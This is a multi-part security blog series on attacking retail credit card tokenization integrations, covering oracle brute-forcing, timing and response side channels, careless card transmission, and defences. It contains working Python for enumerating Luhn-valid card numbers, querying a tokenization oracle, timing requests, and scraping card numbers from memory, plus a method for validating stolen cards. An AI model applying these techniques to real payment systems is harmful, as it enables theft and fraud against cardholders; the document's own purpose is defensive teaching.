# Breaking Credit Card Tokenization

Originally published as a series here, here, here, and here.

This is a series of blog posts on the topic of breaking credit card tokenization systems and is the written version of several conference presentations I have given on this subject. This post will address the core terms and history before digging into one of the attacks we have successfully executed against some of our retail clients’ tokenized payment systems. Other attack techniques that we have also successfully executed against clients’ systems will follow in future posts.

Note that none of the attacks discussed in this series are cryptographic attacks on the generation of tokens. Instead, all are attacks against the integration of tokenized payment services with another front-end retail application.

Long before the idea of tokenization came along, PCI-DSS approved the storage of a credit card’s six-digit prefix representing the issuing bank and the credit card’s four-digit suffix. This is called “truncation” in PCI parlance. Essentially, all a merchant needs to eliminate is the middle six digits (six-digit prefix + four-digit suffix = 10 digits), as shown in the figure below:

## Computational Complexity of the Middle Six Digits

At first glance, the worst case for brute forcing the middle six digits of a truncated credit card number appears to be 10^6 (1,000,000) tries. However, credit card numbers implement the Luhn algorithm (http://en.wikipedia.org/wiki/Luhn_algorithm), also known as the "mod 10" or "modulus 10" algorithm, which uses the last digit of the card number as a check digit. This reduces the search space by an order of magnitude, bringing the worst case down to 10^5 (100,000) tries. The average case is 50,000 tries, and the best case, of course, is a single lucky guess. An offline brute force attack against a password with such low computational complexity would be trivial, but in most credit card tokenization scenarios, brute forcing those middle six digits requires an online attack, which is considerably more difficult.
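
The arithmetic is easy to verify with a quick sketch (Python, my own naming): a Luhn check plus an enumeration of every PAN consistent with a truncated record. For any six-digit prefix and four-digit suffix, exactly 100,000 of the 1,000,000 possible middle-six combinations survive the check:

```python
def luhn_valid(pan: str) -> bool:
    """Return True if the digit string passes the Luhn (mod 10) check."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:      # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9      # equivalent to summing the two digits
        total += d
    return total % 10 == 0

def middle_six_candidates(prefix6, last4):
    """All Luhn-valid PANs sharing a known 6-digit prefix and 4-digit suffix."""
    return [f"{prefix6}{m:06d}{last4}"
            for m in range(1_000_000)
            if luhn_valid(f"{prefix6}{m:06d}{last4}")]
```

Note that the check digit lives in the known four-digit suffix, which is why exactly one in ten middle-six combinations validates.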

A common practice with PCI compliant merchants is to reduce PCI scope by eliminating the full 16-digit credit card number from commerce systems, only storing a “token” that represents the credit card. This process is known as “credit card tokenization” in PCI parlance. The ultimate benefit to the merchant is the reduction of PCI compliance scope and risks related to breaching the outward facing point of sale systems.

There are several implementation variants of credit card tokenization. Some tokens are 16-digit surrogate numbers, so they fit in the space already allocated to "real" credit cards in legacy point of sale systems. Other tokens are longer, requiring modification of the commerce system to store them; these can be based on salted cryptographic hashes of the original card number, or simply on long random identifiers.

The most common implementations rely on the full credit card processing and storage capabilities of large payment gateway service providers. However, some larger enterprises have chosen to implement their own payment tokenization systems internally, typically hosted in a DMZ, separated from the commerce systems to reduce PCI scope. In those scenarios, enterprises have essentially turned a small portion of themselves into tokenized payment gateway service providers, making them choice targets for tokenization exploits.

The enterprise “DIY” version is the target of this blog series, although some of the attack techniques could possibly carry over into the commercial tokenization services offered by payment gateways.

Regardless of the architecture, if a full credit card number is transmitted to a system component, that component is IN PCI SCOPE. For almost a decade now, I have explained this as “PCI cooties, you touch it, you’ve got it.” This is important to remember when considering the attacks described in this series.

## Malicious Insiders

For the purpose of this blog series, the term "malicious insider" will mean an employee or contractor of the merchant who has access to the front-end retail application but is unauthorized to access the back-end payment system that contains the full 16-digit Primary Account Numbers (PANs) that correspond with tokens. These insiders may be in system admin, developer, DBA, or similar roles within the merchant and will likely have access to truncated PANs, customer billing information (names, addresses, phones, etc.), and, of course, tokens. They also have the ability to observe the front-end talking to the tokenized systems.

## The Ideal Defense Against Malicious Insiders

The ideal defensive position is to implement credit card tokenization such that the malicious insider's best attack is identical to brute forcing truncated PANs. That attack would entail exfiltrating customer billing information, truncated PANs, and expiration dates, then attempting online transactions at other merchants. Fifty thousand failed transactions later (on average), perhaps they'll get the card number right, and perhaps that card will have some available balance for causing damage. However, this is a noisy attack, and the payment gateway and the banks will apply their fraud checks along the way. This is a very safe place to be as a tokenized merchant.

## The Worst Case Defense Against Malicious Insiders

This worst-case scenario is only applicable to payment gateways exposing a tokenization API, or to those enterprises that run their own centralized instance of a tokenization service internally, and mirrors an engagement with a retail client (names, URLs, and parameters changed to protect the innocent, of course). Suppose an internet-facing commerce application (store.example.com) embeds a call to a web API in a special PCI DMZ that takes a credit card as input similar to this request:

POST /api/generateCcToken HTTP/1.1
Host: payment.example.com
Connection: keep-alive
Accept: */*
Content-Type: application/json
Content-Length: 55

{"cc":"4111111111111111","expmm":"12","expyyyy":"2017"}

Since this is a tokenization scenario, the user's browser must make the call directly to the payment server in the tokenization DMZ. If the user's browser sent this credit card data to the front-end e-commerce application, then that application and its entire hosting environment would have touched PANs and would therefore fall into full PCI scope, negating the whole point of tokenization. In the early days of credit card tokenization, the web app silently redirected the browser to a second server to process the credit card, which provided a mostly seamless customer experience, since users rarely notice that the destination of the credit card form POST is a different server. (Memory lane: back in the IE6 days, this wasn't so "silent," as the user could hear "click, click, click" sounds while the redirects happened in quick succession.) The payment server would then typically respond with a simple HTML form and JavaScript to auto-submit the tokenized response back to the original app server when the page loaded.

But today, with asynchronous requests and JSON, applications can do this more seamlessly than before. In this case, the request was initiated from JavaScript living in the browser, available for full introspection by a potential attacker, and the payment server responded with a hash of the credit card. The response looked something like this:

HTTP/1.1 200 OK
Content-Type: application/json

[…snip…]

We can assume the hash is concatenated or salted with secret values that only a select few can access, so offline attacks are basically pointless; not impossible, just implausible. Since this call to /api/generateCcToken went to a different server and DNS domain (payment.example.com) in the PCI DMZ, separate from the main application (store.example.com), no authenticated session cookies accompanied it. In other words, all requests to this service were essentially anonymous. Even if the front-end application (store.example.com) set its cookies on the parent domain (example.com), the session data should not be shared between the store and the payment service, because doing so blurs the lines of segmentation and likely passes the "PCI cooties" from the payment server to the store. Once the payment server generated the hashes, they lived in a database accessible to business users, through an internal web app, for legitimate sales and customer support reasons. Those users could search on name, expiration date, and other transaction metadata, revealing the hashes and truncated PANs. See where this is going yet?

If a malicious insider were to target a specific tokenized credit card record, extracting the truncated PAN and metadata, that insider could interrogate the /api/generateCcToken service by iterating through all of the possible 10^5 permutations of valid credit card numbers that satisfy the Luhn check until the output matches the hash stored in the front-end application's database. One hundred thousand queries in a row might raise some eyebrows (or it might not, depending upon the monitoring and the size of the environment), but 100,000 queries spread out over days or weeks probably would not, especially if more than one tokenized credit card is targeted and multiple source hosts can be used to further anonymize the requests (think: botnet). Since this API call only generates the tokenized credit card record and never attempts to authorize a transaction through a payment provider's merchant account, the banks' fraud systems would never come into play. If the enterprise's internal tokenization system processes thousands of legitimate requests per day or more, it would be fairly easy for an attacker to "slow burn" the service and harvest the credit cards without detection.
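
A sketch of that interrogation loop, with the oracle injected as a function so the mechanics are clear. In the real attack, query_token would be a POST to /api/generateCcToken; the Luhn helper and every other name here are mine:

```python
import hashlib

def luhn_valid(pan: str) -> bool:
    """Standard Luhn (mod 10) check."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

def find_pan(prefix6, last4, target_token, query_token):
    """Replay every Luhn-valid candidate through the tokenization oracle
    until one produces the token already sitting in the store's database."""
    for m in range(1_000_000):
        pan = f"{prefix6}{m:06d}{last4}"
        if luhn_valid(pan) and query_token(pan) == target_token:
            return pan
    return None
```

Spread those ~100,000 oracle queries over weeks and source hosts, and the "slow burn" described above is the whole attack.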

Of course, this is why PCI DSS requirement 3.4 has this nice warning:

> Note: It is a relatively trivial effort for a malicious individual to reconstruct original PAN data if they have access to both the truncated and hashed version of a PAN. Where hashed and truncated versions of the same PAN are present in an entity’s environment, additional controls should be in place to ensure that the hashed and truncated versions cannot be correlated to reconstruct the original PAN.
>
> By correlating hashed and truncated versions of a given PAN, a malicious individual may easily derive the original PAN value. Controls that prevent the correlation of this data will help ensure that the original PAN remains unreadable.

## A Better Solution

Normally, in a direct object reference scenario (the credit card number acts like an insecure direct object reference in this case), encrypting the parameter's value makes the problem go away; not in this case. If the credit card number is sent to the front-end e-commerce system for encryption first, then the point of tokenization has been defeated (remember: PCI cooties). If the credit card is encrypted in the user's browser, then an attacker can simply unravel the JavaScript performing the encryption, steal the key, and incorporate the encryption into the attack.

Consider if the request looked like this:

POST /api/generateCcToken HTTP/1.1
Host: payment.example.com
Connection: keep-alive
Accept: */*
Content-Type: application/json
Content-Length: 142

{"authToken":"VGhpcyBpcyBqdXN0IGFuIGV4YW1wbGUuIEEgcmVhbCBvbmUgd291bGQgYmUgYmV0dGVyLg==","cc":"4111111111111111","expmm":"12","expyyyy":"2017"}

Assuming that the “authToken” parameter is encrypted with a key that is shared by the front-end e-commerce system and the payment service, and that the decrypted contents contain a unique identifier and some sort of time-to-live value, then the payment server could implement throttling and immediately identify and block bad actors. Essentially, this is a federated authentication solution to the prior problem, and federation is certainly not a novel idea. However, tokenized payment services in large enterprises commonly fail to implement proper hand-off authentication between the services. This solution won’t eliminate all abuse of the tokenization system, but it will considerably reduce its likelihood.
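
One way to sketch that hand-off (all names are my own, and I've used an HMAC-signed token rather than an encrypted one, which is sufficient for the identification and throttling described above):

```python
import base64
import hashlib
import hmac
import json
import time

# Hypothetical key provisioned to both the store and the payment service.
SHARED_KEY = b"example-shared-secret"

def mint_auth_token(session_id: str) -> str:
    """Front-end e-commerce system creates a short-lived, signed token."""
    payload = json.dumps({"sid": session_id, "exp": time.time() + 120})
    sig = hmac.new(SHARED_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return base64.b64encode(f"{payload}|{sig}".encode()).decode()

def verify_auth_token(token: str) -> bool:
    """Payment service checks the signature and the time-to-live
    before agreeing to tokenize anything."""
    payload, sig = base64.b64decode(token).decode().rsplit("|", 1)
    expected = hmac.new(SHARED_KEY, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return False
    return json.loads(payload)["exp"] > time.time()
```

The payment service can now key its throttling and blocking on the authenticated session identifier instead of treating every request as anonymous.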

## Side Channels

Side channels are unintended ways information can be observed in a system. Attackers can leverage side channels to make software divulge details that developers never intended. For a deeper dive on the subject, look at Shannon’s Information Theory to understand key ideas like entropy and signal-to-noise ratios. In this post, we will dig into a timing side channel attack against credit card tokenization systems.

## Timing Side Channel Attacks

Developers are trained from day one to optimize software performance: store only a single copy of data on disk, make as few round trips to the server as possible, and so on. Credit card tokenization system developers are no different. Why store the same credit card multiple times or query the database an extra time? Like the other attacks from part one of this series, the devil is in the details.

On an engagement with a large retail client, a tokenization service's response time was observed to be roughly twice as long when the credit card number submitted to the service was brand new (i.e., never seen by the payment server previously). Even better for an attacker: the response time was dependably regular, similar to the following table:

(Table omitted: columns were "Card Number," "Response Time," and "Hit or Miss?")

This response time data was the result of an algorithm similar to this pseudocode:

hash := sha256(salt + creditCard)
dbResults := sql(select * from CC where hash = hash)
if (dbResults > 0):
    return dbResults[0]
else:
    sql(insert into CC (creditCard))
    return hash

This would explain why a new card number resulted in longer response times: it queries the database twice. To the attacker, it doesn't matter why one conditional branch of the software takes longer than the other, only that there is a clear signal in the noise. If unseen Primary Account Numbers (PANs) have a reliably distinct response time from PANs already in the system, then an attacker can send in a batch of records and observe the differences in response times. Think of this attack as locating a Boolean true/false buried deep in the response time metadata.

## Direct Exfiltration with Timing Attacks

Credit card data exfiltration via timing analysis is actually simple to do. The mechanics look a lot like the malicious insider's correlation of truncated credit card numbers discussed in the first post in this series: just brute force the service with 16-digit numbers that pass the Luhn check and set the stopwatch. Some environmental conditions may come into play, such as peak business times, or perhaps a node in the load balancer pool with degraded or damaged disks (anyone with a background in load testing would be well suited to pull off these types of attacks). Automation would look something like the following pseudocode:

def findPan(truncatedPan, token):
    pans = generatePansFromTruncation(truncatedPan)
    foreach pan in pans:
        resultMS = timeTokenPost(pan)
        if (resultMS < 150):
            return pan
    return
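
In practice, raw stopwatch readings are noisy, so a working timeTokenPost() samples each candidate several times and keeps the median. A sketch, where send_once stands in for a single POST of one candidate PAN to the tokenization service:

```python
import statistics
import time

def time_token_post(send_once, samples: int = 9) -> float:
    """Median round-trip time in milliseconds over several trials;
    the median damps outliers from load balancers, GC pauses, etc."""
    trials = []
    for _ in range(samples):
        start = time.perf_counter()
        send_once()
        trials.append((time.perf_counter() - start) * 1000.0)
    return statistics.median(trials)
```

With a dependably regular service like the one above, even a handful of samples per candidate separates the two code paths cleanly.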

It is important to note that this type of data exfiltration, using solely the timing of the responses as the signal of a "legit" versus "not legit" credit card, cannot provide the attacker with all of the details needed to carry out fraud. The attacker still needs the billing address, which a malicious insider would have.

## Using Timing Analysis to Validate Stolen Credit Cards

Another use for this type of attack is performing QA checks on the latest batches of breached credit card numbers floating around the darker parts of the web after a major retailer's breach. If an attacker steals credit card data from brick-and-mortar retailer A, a sufficient overlap in the customer base at online retailer B may make it possible to validate which cards the banks have not yet reissued a couple of months after the initial breach. Retailer B might want to wash its hands of any responsibility, citing retailer A's initial breach, but retailer B didn't do its customers any favors by having a timing side channel defect in its credit card tokenization system.

## Preventing Timing Attacks

Preventing timing attacks has a simple goal: make the response times of both code paths (credit card already stored in the tokenization system versus new credit card) as indistinguishable as possible. This means developers need to unlearn what they learned in their very first programming class (and probably every class since) and introduce intentional inefficiencies into the faster code path. Some developers may choose to create arbitrary load (such as performing arithmetic operations) or introduce a sleep() call for a duration close to the average response-time delta. However, a great solution (that DBAs won't like) is to query the database the same number of times on both code paths, like this:

hash := sha256(salt + creditCard)
dbResults := sql(select * from CC where hash = hash)
if (dbResults > 0):
    sql(select * from CC where hash = hash) // an extra db call
    return dbResults[0]
else:
    sql(insert into CC (creditCard))
    return hash

Input/output (I/O) is the slowest link and depends on the environment. A hardcoded sleep() call may work at specific times of day, but if the database is slower or faster one day due to peak load, or perhaps after an infrastructure upgrade, then the distinguishable timing side channel will return.
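
A sturdier variant removes the branch entirely: insert first (ignoring duplicates), then select, so the same statements execute whether the card is new or not. A sketch with SQLite and my own table layout:

```python
import hashlib
import sqlite3

def tokenize(conn: sqlite3.Connection, salt: str, pan: str) -> str:
    token = hashlib.sha256((salt + pan).encode()).hexdigest()
    # Both the "new card" and "seen it before" cases execute the exact
    # same statements, so the code path no longer leaks which case occurred.
    conn.execute("INSERT OR IGNORE INTO cc (hash) VALUES (?)", (token,))
    conn.commit()
    row = conn.execute("SELECT hash FROM cc WHERE hash = ?", (token,)).fetchone()
    return row[0]
```

Even this is not perfectly flat, since a real insert performs more I/O than an ignored one, so measuring the deployed service under realistic load is still worthwhile.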

## My Profile Side Channel Attacks

Many commerce apps — especially ones using credit card tokenization — implement a "My Profile" type feature in which the customer can save a form of payment for future reuse. If an attacker can take over a customer's account or session (e.g., by stealing credentials, or if the application switches between HTTP and HTTPS with the same session cookies, making a man-in-the-middle attack possible), then the attacker can browse to the "My Saved Credit Cards" page, observe the truncated PAN data, and then proceed to add new credit cards to the user's profile, analyzing the responses.

For example, suppose Alice, a user on the e-commerce site, has three saved credit cards in her user profile. An attacker who has stolen her session or credentials can observe the truncated details of each saved card, such as the card type and the last four digits.

This metadata is not quite as helpful as what the malicious insider above may have, but it is still enough to home in on specific attacks. All of the potential credit card prefixes for Visa, MasterCard, and American Express are open source knowledge for a given target country. An attacker can use this information to generate a list of potential PANs that match this very truncated version and, one at a time, attempt to add them to Alice's profile. If a fourth payment method appears on the list, then the attacker did not discover one of Alice's credit cards. However, if the number of payment methods stays the same, then the attacker just discovered one of Alice's credit cards. The following pseudocode illustrates the algorithm (award bonus points for deleting each bogus credit card that didn't match what the application already had in the database):

def findPan(truncatedPan):
    pans = generatePansFromTruncation(truncatedPan)
    count = countCCsInProfile()
    foreach pan in pans:
        addCcToProfile(pan)
        newCount = countCCsInProfile()
        if (count == newCount):
            return pan // Hit!
        else:
            removeCcFromProfile(pan)
    return

Behind the scenes, this is another example of developers doing what they are trained to do: be efficient. If a credit card tokenization record already exists, then adding a duplicate violates the efficiency rules developers are taught. Thus, another side channel attack is discovered.

## Preventing My Profile Attacks

The fix here, like the fix in the second post in this series, is to intentionally introduce some inefficiency into the application rather than leave behind a mechanism that leaks a Boolean true/false answer about whether a credit card already exists. A suggestion we often provide to developers is to return a new payment method ID or token even if the credit card matches a record already in the database.
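
That suggestion costs almost nothing to implement. A sketch with an in-memory profile store (names are mine): every add mints a fresh payment-method ID, duplicate card or not, so neither the response nor the saved-card count reveals that the card was already on file.

```python
import secrets

def add_payment_method(profile: dict, pan_hash: str) -> str:
    """Always return a brand-new payment-method ID, even for a duplicate
    card, so the response shape never betrays a match in the database."""
    method_id = secrets.token_hex(16)
    profile.setdefault(pan_hash, []).append(method_id)
    return method_id
```

Behind the scenes, the tokenization system can still deduplicate storage; the point is that nothing observable to the caller changes between the duplicate and non-duplicate cases.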

Some developers who really like REST can be downright fanatical about RESTful design requirements, splitting hairs over whether a particular implementation is truly RESTful or not. Many large development teams have at least one of these “RESTful service geeks” (my moniker for them), but do not let them design your RESTful credit card tokenization service. Consider the following tokenization request from above:

POST /api/generateCcToken HTTP/1.1
Host: fakeretailpaymentprovider.com
Connection: keep-alive
Accept: */*
Content-Type: application/json
Content-Length: 142

{"authToken":"VGhpcyBpcyBqdXN0IGFuIGV4YW1wbGUuIEEgcmVhbCBvbmUgd291bGQgYmUgYmV0dGVyLg==","cc":"4111111111111111","expmm":"12","expyyyy":"2017"}

A RESTful service geek will instruct developers that HTTP status codes should be very distinct. For example, the service might return the following response:

HTTP/1.1 201 Created
Content-Type: application/json
[…snip…]

Or perhaps this:

HTTP/1.1 202 Accepted
Content-Type: application/json
[…snip…]

Something as small as "201" versus "202" can indicate a world of contextual difference. An attacker will likely learn that "201 Created" means the credit card in the tokenization request has not previously been seen by the tokenization system, so the system created a brand new token record for it. Likewise, an attacker might decipher "202 Accepted" as an indication that the credit card already exists in the system. Or perhaps there are custom HTTP headers added or updated on the service's response (especially likely if the service is designed for consumption by a mobile application, where developers assume nobody will ever see those headers). Any of these can be enough of a signal, no matter how subtle; just take the blinders off and look carefully at every detail. We have seen this attack's cousin for years now: web applications that are kind enough to tell us whether a user account already exists at registration or during an attempt to recover a user ID or password.

This insight, coupled with the scenarios already presented in this series where an attacker may know truncated PANs and billing information, can also lead to credit card exfiltration.

A safe implementation always responds the same way regardless of the internal differences. It's boring, and it probably doesn't comply with all of the RESTful principles, but it protects knowledge of which credit cards are stored in the system. The following is a nice safe response:

HTTP/1.1 200 OK
Content-Type: application/json
[…snip…]

## Careless Transmission of Credit Cards

Remember that the main point of credit card tokenization is to keep PANs (Primary Account Numbers) out of the main application-hosting environment. Merchants accomplish this by transmitting the PAN from the customer's browser directly to a tokenization server in a special PCI DMZ, where the litany of expensive and restrictive PCI controls fully applies. Keeping the PAN out of the hosting environment minimizes costs and restrictions on the main application's environment, which is why anyone would want to implement tokenization (ahem, cough ... of course it also reduces risk, right?). However, in my experience across multiple client engagements (and admittedly once or twice in a past life as a developer integrating e-commerce applications against payment gateways' tokenization APIs), subtle code flaws have allowed PANs to accidentally be transmitted to the application server.

## ASP.NET Web Forms

Almost routinely, assessments of commerce systems written in ASP.NET Web Forms turn up this issue, especially if tokenization was not in the original feature set. Web Forms keeps the developer abstracted a layer or two away from the bare metal of the web (which is why Microsoft created ASP.NET MVC), and its use of "controls" to promote code reuse can result in forgotten or unexpected behavior. Requests from web control validators, partial update panels, and other AJAX-ish ASP.NET controls can generate events that require round trips to the server, like this request, for example, which I captured from an actual production commerce system (and sanitized):

POST /CreditCardPayment.aspx?c29tZXBhcnRpYWx1cGRhdGVzdHJpbmdnb2VzaGVyZS1rdWRvc3RveW91Zm9yZGVjb2Rpbmd0aGlzIQ== HTTP/1.1
Host: somefakeretailer.com:443
Connection: keep-alive
Content-Length: 3265
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
X-MicrosoftAjax: Delta=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.91 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
[…snip…]

ScriptManager1=upCcNumber&txtboxfname=Tim&cardNumber=4111111111111111&securityCodeNumber=123&txtboxlname=MalcomVetter&ddlExpMM=01&ddlExpYYYY=2017[…snip…]

In the above example, the developers did not realize it was happening, and the application server was not persisting the credit card numbers, but the numbers were transmitted to the application server, which technically ruins the point of tokenization. (It also exposes the application to additional attacks, as we will discuss later.) The solution is not to mix any controls that make __doPostBack() calls on the same pages that present payment forms. In the .NET developer community, there are humorous T-shirts that sum this up quite well.

Some clever developers attempted to mix and match these types of controls on payment forms by inserting their own JavaScript to purge the credit card number values on postback events before data is sent to the server. Anyone who has spent time with ASP.NET Web Forms and its nested, complicated controls knows firsthand that the DOM IDs for these fields can be very complicated:

ctl00_ContentPlaceHolder1_TextBox3

These IDs can be changed by any upstream code checked in later by another developer on the same team. As a result, this approach is like walking on eggshells made of JavaScript, especially if your QA team does not specifically verify this JavaScript sanitization before each release.

## Card Type Prefix Fetching

Another common example of careless transmission of credit card data in web apps is the predetermination of card type on payment detail forms. For example, we observed the following request taking the onkeypress events from a credit card text field and sending them as JSON to the server so that the card type drop-down list box could be dynamically filled in:

POST /api/ccType HTTP/1.1
Host: fakeretailpaymentprovider.com
Connection: keep-alive
Accept: */*
Content-Type: application/json
Content-Length: 23

{"ccPrefix":"41111111"}

The first keypress event generated a post similar to the above with a "ccPrefix" of "4," followed by "41," then "411," and so on. It was immediately apparent that the JavaScript logic was flawed and would result in the first 15 digits of the full 16-digit number (or close to it, depending on whether the user typed faster than the JavaScript could execute its next pass) being sent to the application server. The developers probably thought they were saving their customers a couple of clicks on the card type drop-down box, but they would have been better served leaving the card type drop-down off the payment form entirely, instead implementing the card type lookup logic on the server side. In general, latching onto events like onkeypress produces behavior that differs subtly per browser and even per browser add-on. For example, a saved credit card number automatically pasted into the form by a browser's credit card e-wallet may not trigger the onkeypress event at all.
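
For what it's worth, the card brand is fully determined by well-known prefix ranges, so wherever the lookup runs, it needs only the first digit or two, never fifteen. A simplified sketch (real BIN tables are far more granular than this):

```python
def card_type(digits: str) -> str:
    """Determine the card brand from the leading digits alone
    (simplified; production code would consult a full BIN table)."""
    if digits.startswith("4"):
        return "Visa"
    if digits[:2] in {"51", "52", "53", "54", "55"}:
        return "MasterCard"
    if digits[:2] in {"34", "37"}:
        return "American Express"
    return "Unknown"
```

Had the developers written the lookup this way, there would have been no reason to stream most of a PAN to the application server keystroke by keystroke.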

## Form Tags and Other JavaScript Bugs

Another tokenization implementation flaw that can be found with deep scrutiny is a set of <form> tags with an "action" that JavaScript is meant to modify at runtime in the browser to point at the tokenization server. This is similar to the ASP.NET web controls issue above but appears in applications built on many development platforms: Java, PHP, etc. To do tokenization correctly (as stated numerous times above, but here it comes once more), the client side has to behave as expected. It must send the credit card details to the tokenization service and never to the main commerce application server, for any reason.

Since the browser must behave, the JavaScript powering the page must behave, and all the platform-specific behavioral nuances must be considered completely by the developers. If a customer's browser throws an exception in the JavaScript that causes execution to fall out of the function that switches the <form> tag's action, then that customer's browser will send PANs to the application server, like it or not. Even more dangerous is linking to hosted JavaScript libraries on different domains, since a man-in-the-middle, or even a timeout fetching those libraries, can cause unanticipated logic flaws.

## Scraping the RAM of Web Servers

It’s common knowledge that attackers breach point-of-sale (POS) systems by scraping RAM for credit card data, searching for regular expressions that match PANs and even full magnetic stripe data as a post-exploitation activity (after attackers gain an initial foothold into the systems). This is possible because of the architecture — the POS systems have to have a copy of PANs in memory for at least a brief amount of time. It’s not often remembered, but the same is true for any web server that receives a PAN as a web request — even if that request was submitted over HTTPS, encoded as JSON, form-urlencoded, XML, etc., the server will have a plaintext copy in RAM temporarily — ripe for RAM scraping.
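
The scraper's core really is that simple: a regular expression over a raw buffer plus a Luhn filter to discard false positives (obtaining the buffer, not this code, is the hard part for the attacker):

```python
import re

def luhn_valid(pan: str) -> bool:
    """Standard Luhn (mod 10) check."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

# 16-digit runs not embedded in longer digit strings.
PAN_PATTERN = re.compile(rb"(?<!\d)\d{16}(?!\d)")

def scrape_pans(buffer: bytes):
    """Pull every 16-digit run out of a raw memory buffer and keep only
    those that pass the Luhn check, discarding most false positives."""
    return [m.group().decode() for m in PAN_PATTERN.finditer(buffer)
            if luhn_valid(m.group().decode())]
```

Real POS malware uses the same idea with additional patterns for full magnetic stripe (track) data.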

With a foothold into the servers hosting the commerce application, an attacker can scrape RAM to harvest credit card data that was sent to the server, whether sent erroneously or not. If the application is built in Java or .NET (or other languages with immutable strings) the persistence of these little credit card gems in memory increases considerably and would not require repeated real-time scraping. On a high-volume commerce app, if even 5–10 percent of the transactions erroneously transmitted credit card data back to the main app servers, there would be more than sufficient economic incentive for an attacker to hang out and pick up a copy of this low-hanging fruit.

## Was It a DevOps Accident?

As seen in this post, even a subtle flaw can result in the accidental transmission of credit card data back to the commerce server, where it could end up in debug logs or core dumps, or simply be scraped from RAM. With DevOps, organizations now have far more code-savvy individuals supporting their continuous delivery deployments. With JavaScript-heavy apps, a full build (compilation) of the application is not necessary to introduce unwanted changes to the application's logic. It is common for merchants to have layers of controls around build automation (who introduced which code change, and when), but once that code is released to the DevOps team to maintain in the production environment, what file integrity controls are monitoring for changes in the JavaScript? From my experience as a developer and a consultant, organizations rarely watch the content of .js files. Introducing and reverting a malicious change in JavaScript would be easy for a developer-minded admin gone rogue to accomplish with just a simple text editor on the server (think: means, motive, opportunity).

Exfiltration of PANs by a malicious member of a DevOps team is also plausible. “I saw some performance issues, so I am profiling some processes, which may generate some process dumps or debug logs on the commerce app servers.” If ever there was a possibility for a malicious insider to pull off a “salami slicing” attack, this is it. Unfortunately, penetration tests where the tester gets to pretend to be a build and release engineer are very rare.

## Recap

Commerce applications that integrate with credit card tokenization systems, especially enterprise-specific systems, are not automatically immune to attack, no matter what your PCI QSA or even your payment gateway service provider says. Like anything else, the devil is in the details, so resist the binary response of, "We do tokenization; therefore, we are safe." Mature organizations that care about managing risk will go beyond the PCI minimum required testing, bring in experts who understand these attack vectors, and carefully analyze their payment systems with a fine-tooth comb.